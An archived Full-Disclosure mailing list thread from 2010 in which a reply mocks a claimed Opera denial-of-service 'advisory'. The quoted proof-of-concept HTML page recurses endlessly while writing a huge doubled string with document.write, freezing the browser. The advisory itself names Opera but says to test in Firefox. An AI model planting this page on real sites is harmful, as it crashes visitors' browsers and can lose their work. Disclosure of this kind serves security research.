lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 3 Mar 2010 01:35:30 -0800
From: information security <informationhacker08@...il.com>
To: Jeff Williams <jeffwillis30@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Opera (plenitude String )Denial of Service
	Exploit

Thanks .Jeff for all your comment
so how to fix that

On Tue, Mar 2, 2010 at 8:42 PM, Jeff Williams <jeffwillis30@...il.com>wrote:

> You gotta be joking, this is probably the 3000th DoS "advisory" for
> document.write.
>
> Guess what sparky, even Jeremy Brown didn't post that one.
>
> Thus no surprise exploit-db post this kind of shit.
>
>
> 2010/3/3 information security <informationhacker08@...il.com>
>
>> ======================================================================
>>
>>
>>                       Opera (plenitude String )Denial of Service Exploit
>>                      =======================================================================
>>
>>
>>                                                      by
>>
>>                                             Asheesh Kumar Mani Tripathi
>>
>>
>> # code by Asheesh kumar Mani Tripathi
>>
>> # email informationhacker08@...il.com
>>
>>
>> # company       www.aksitservices.co.in
>>
>> # Credit by Asheesh Anaconda
>>
>>
>> #Download http://www.opera.com/download/
>>
>>
>>
>> #Background
>>
>> Opera is a popular internet browser :)
>>
>> #Vulnerability
>> This bug is a typical result when attacker try to write plenitude String in
>> document.write() function .User interaction is required to
>>
>>
>> exploit this vulnerability in that the target must visit a malicious
>> web page.
>>
>>
>>
>> #Impact
>> Browser doesn't respond any longer to any user input, all tabs are no
>> longer accessible, your work if any   might be lost.
>>
>>
>>
>>
>> #Proof of concept
>> copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
>>
>> ========================================================================================================================
>>
>>
>>                                                            asheesh.html
>> ========================================================================================================================
>>
>> <html>
>>
>>
>> <title>asheesh kumar mani tripathi</title>
>> Asheesh kumar Mani Tripathi
>> <head>
>>
>> <script>
>> 	
>> 	
>> 	
>> function asheesh ()
>>  {
>> 	var	i , anaconda = "XXXX"
>> 	for(i=24;i >0 ;--i)
>>
>>
>>  {
>> 		anaconda=anaconda+anaconda;
>> 	}
>>
>>     document.write(anaconda);
>>
>>   asheesh();
>>
>> }
>> asheesh();
>>
>> </script>
>> </head>
>>
>> <body onLoad="asheesh()"></body>
>>
>>
>> </html>
>>
>>
>>
>> ========================================================================================================================
>> Why do you worry without cause? Whom do you fear without reason? Who can kill you?
>>
>>
>> The soul is neither born, nor does it die.
>>
>>
>> #If you have any questions, comments, or concerns, feel free to contact me.
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists